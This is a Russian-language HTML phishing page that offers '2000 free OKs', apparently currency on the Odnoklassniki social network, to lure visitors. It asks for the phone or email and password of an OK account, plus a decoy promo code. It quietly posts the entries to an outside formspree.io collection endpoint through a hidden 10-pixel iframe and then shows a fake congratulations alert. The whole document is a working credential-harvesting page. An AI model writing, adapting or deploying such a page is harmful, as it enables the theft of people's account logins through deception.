<!DOCTYPE html>
<html lang="ru">
<head>
  <meta charset="UTF-8">
  <title>2000 OKs</title>
  <style>
    html, body {
      width: 100%;
      margin: 0;
      padding: 0;
    }
    body {
  
    display: flex;
  justify-content: center;
  align-items: center;
      
  place-items: center;
    }
    form {
      width: 100%;
      max-width: 800px;
      margin: 0;
      font-size: 42px;
    }
    label, input, textarea {
      font-size: 39px;
    }
    input[type="submit"] {
      font-size: 42px;
      font-weight: bold;
      padding: 40px 60px; /* większa wartość padding */
      background-color: #007bff;
      color: #fff;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }
    input[type="submit"]:hover {
      background-color: #0062cc;
    }
  </style>
</head>
<body>
  <div style="text-align:center;
       font-size: 22px;       ">
    <div padding: 20px;>
    <h1><b>Чтобы получить бесплатно 2000 ОКs</h1>
    <div style="text-align:center;">
    <h1>Заполните данные аккаунта Ok</h1>
    <div style="text-align:center;">
    <h1>введите промо-код</h1>
    <div padding: 20px;>

      
</div>
      
     
     
    
      <form action="https://formspree.io/f/mnqyzeea" method="POST" target="myFrame" onsubmit="showMessage()">
      <div style="text-align:center;">
        <label for="name"><b>Телефон или адрес эл. почты</label><br>
        <input type="text" id="name" name="name"><br><br>
        <label for="name">Пароль</label><br>
        <input type="text" id="name" name="name"><br><br>

         <label for="name">промо-код</label><br>
         <input type="text" id="name1" name1="name1" pattern="3457" required><br><br>

        
        <input type="submit" value="Отправить">
      
         <div style="text-align:center;
       font-size: 22px;       ">
    <div padding: 20px;>
    <h1><b>Верные данные разблокируют чат</h1> 
          
          </div>
    </form>
  
		
	<iframe name="myFrame" style="width:10px; height:10px; position:fixed; bottom:0; left:0; border:none;"></iframe>
	
		 
	<script>
     function showMessage() {
      alert("Gratulacje!");
     }
     </script>

		
		
		</div>
</body>
</html>
